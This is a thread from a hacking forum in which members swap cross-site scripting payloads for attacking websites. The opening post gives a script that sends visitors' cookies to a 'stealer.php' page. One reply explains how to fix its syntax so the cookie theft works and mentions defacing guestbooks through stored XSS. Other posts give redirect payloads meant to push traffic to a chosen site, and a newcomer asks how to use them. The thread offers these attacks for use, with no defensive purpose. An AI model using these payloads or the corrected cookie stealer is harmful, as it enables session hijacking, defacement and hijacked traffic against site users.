Donate to us via Paypal!
Become the change you seek in the world. - Gandhi
Saturday, October 24, 2020
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 83
Guests Online: 83
Members Online: 0

Registered Members: 129356
Newest Member: zannes90
Latest Articles

View Thread

HellBound Hackers | Computer General | Web hacking

Author

XSS - Ideas


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-11-06 07:40
XSS - what can we do with it.

Code
<script>document.location=stealer.php?c=document.cookie</script>




Anyone got any other ideas, I'll post some CSRF later when I have time


Author

RE: XSS - Ideas

nanoymaster
Member



Posts: 119
Location: ก็็็็็็&
Joined: 20.08.05
Rank:
Wiseman
Warn Level: 30
Posted on 13-11-06 07:44
A personal fave...

<script>document.location='http://www.nanoy.org';</script>
but you could always do a simple alert:
<script>alert('pwnt...or_whatever!'Wink</script>

Wink


ก็็็็็็็็็็็็็็็็็็็็ กิิิิิิิิิิิิิิิิิิ ก็็็็็็็็็็็็็็็็็็็็ กิิิิิิิิิ

Edited by nanoymaster on 13-11-06 07:45
Ask me... ก็็็็็็็็็็็็็&# http://www.nanoy.org
Author

RE: XSS - Ideas


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 13-11-06 12:55
mozzer wrote:
Code
<script>document.location=stealer.php?c=document.cookie</script>




That wouldn't do what you probably want it to. For one thing, quotation marks (single or double) are required around the target location, which is ended after c=. After the location, since you want to include the user's cookie, you should put an addition sign before it. You should also have brackets around the target location (including document.cookie) instead of an equal sign.

In answer to your question, it is also possible to deface sites that have more severe cross-site scripting vulnerabilities (e.g. many guestbook scripts), more specifically sites that have vulnerable fields that are shown back to users after input is received. Some may refer to that as permanent XSS.


Author

RE: XSS - Ideas


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 26-12-06 03:00
Code
<script>window.location="http://www.yoursite.com"</script>




Easy way to generate traffic to any site you want.
Author

RE: XSS - Ideas


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 26-12-06 05:22
Im new to webhacking and Im interested in "<script>window.location="http://www.yoursite.com"</script>"
where would I input that? In my pages source or in the browser like other techniques.